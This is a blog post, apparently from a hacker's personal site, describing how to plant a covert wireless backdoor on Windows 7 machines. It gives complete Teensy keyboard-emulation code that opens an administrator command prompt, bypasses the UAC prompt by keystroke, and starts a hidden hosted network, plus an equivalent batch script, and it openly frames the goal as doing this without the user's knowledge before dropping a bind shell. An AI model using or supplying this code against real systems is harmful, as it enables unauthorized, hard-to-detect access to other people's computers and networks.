Anyways, I learned about an interesting feature in windows 7 that (if your wireless card supports it) allows you to create a software AP. So then you can connect to that and share your internet connection... or set it up without a users knowledge, install a bind shell, and have a very hard to find wireless backdoor.
Now there are a few things that I really like about this.
1) The computer it's setup on doesn't pick up the new wireless network. So while their computer is now broadcasting a new network, when they scan for available wireless networks, they don't pick it up.
2) There's no notifications to the user.
3) You can script it.
4) It'll drive some poor admin NUTS trying to find the physical access point some stupid end user plugged in somewhere.
So I set about to make my teensy emulate a keyboard and type out all the commands I wanted then dump a bind shell and activate it.
Here's the code to start cmd.exe as administrator (this assumes UAC is enabled), and enter the commands to enable a new soft ap with ssid Blakhal0 and wpa passphrase Iamsupercool.
void setup() { }
void loop(){
delay(10000);
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.send_now();
delay(500);
Keyboard.print("cmd");
delay(500);
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
Keyboard.send_now();
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_Y);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
Keyboard.print("netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
Keyboard.print("netsh wlan start hostednetwork");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
Keyboard.print("exit");
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(999999);
}
www.irongeek.com
Having it drop the bind shell is left as an exercise to the reader.
I did send this to Dave Kennedy (ReL1K) www.secmaniac.com to integrate into SET as an arduino payload but I've yet to see it as an option. Or maybe I just didn't see it in the change log, I mean it's not like he releases 15,000 revisions (a day) when he gets on a roll. And I haven't had the occasion to need to use SET in a while.
So for those playing at home the batch equivalent of this is pretty easy to figure out since, well, it's right in there. Of course you're missing the need to run as administrator part, but if you happen to pop a shell on a windows 7 box with wireless you can give this a try or if you're psexec'd in. Again it'll only work if the wireless card will support it and you have to be administrator or better. Most of the wireless cards I've tested it with worked out of the box or just needed a firmware update. I haven't found any (out of the 5 I've tested) that flat out wouldn't work.
-=The Script=-
@echo off
netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool
netsh wlan start hostednetwork
exit
No comments:
Post a Comment
All comments moderated.
Comments like "sweet dude" or "this is awesome" or "thanks" will be denied,
if you've got something genuinely interesting to say, say it. Other than that just sit back and bask in the glory.